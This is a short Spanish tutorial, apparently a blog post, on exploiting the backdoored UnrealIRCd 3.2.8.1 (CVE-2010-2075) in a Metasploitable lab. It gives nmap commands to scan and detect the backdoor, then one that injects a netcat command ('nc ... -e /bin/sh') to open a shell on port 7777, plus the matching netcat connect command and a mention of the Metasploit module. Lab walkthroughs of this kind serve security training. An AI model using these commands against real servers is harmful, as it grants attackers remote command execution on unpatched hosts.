Xplotando con Nmap
Servidor IRC Unreal3.2.8.1 vulnerables ataques fulminante.(Explotando la Vulnerabilidad con Nmap y NetCat bajo Metasplotaible)
se ha detectado continuidad en la instalación de esta versión así como la no actualización por parte de los administradores de red. Esta puerta trasera permitía a cualquier persona ejecutar diversos comandos con los privilegios del usuario ejecutando IRC. La puerta trasera era ejecutada sin importar las restricciones del usuario.
A pesar que se ha ha alertado del problema , analiza tu red en busca de vulnerabilidades.
UnrealIRCd es un servidor IRC Open Source, sirviendo miles de redes desde 1999. Se ejecuta en Linux, OS X y Windows. En el mes de noviembre del año 2009 el archivo de nombre “Unreal3.2.8.1.tar.gz” fue reemplazado por una versión conteniendo una puerta trasera (troyano). a pesar de estar en la versión 4.0.11, se ha detectado continuidad en la instalación de esta versión así como la no actualización por parte de los administradores de red. Esta puerta trasera permitía a cualquier persona ejecutar diversos comandos con los privilegios del usuario ejecutando IRC. La puerta trasera era ejecutada sin importar las restricciones del usuario.
información de la vulnerabilidad.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075
—————————————————————-
explotacion de la vulnerabilidad usando Metasplotable , Nmap y Netcat
nmap -n -sV -O -v 192.168.0.102
nmap -n -v -p 6667 –script=irc-unrealircd-backdoor.nse 192.168.0.102 (saber si es vulnerable)
nmap -n -Pn -p 6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’nc -l -p 7777 -e /bin/sh’ 192.168.0.102 (explotando con Nmap)
nc -n -vv 192.168.0.102 7777
———————————————————————
usando metasploit lanzando el exploit unreal_ircd_3281_backdoor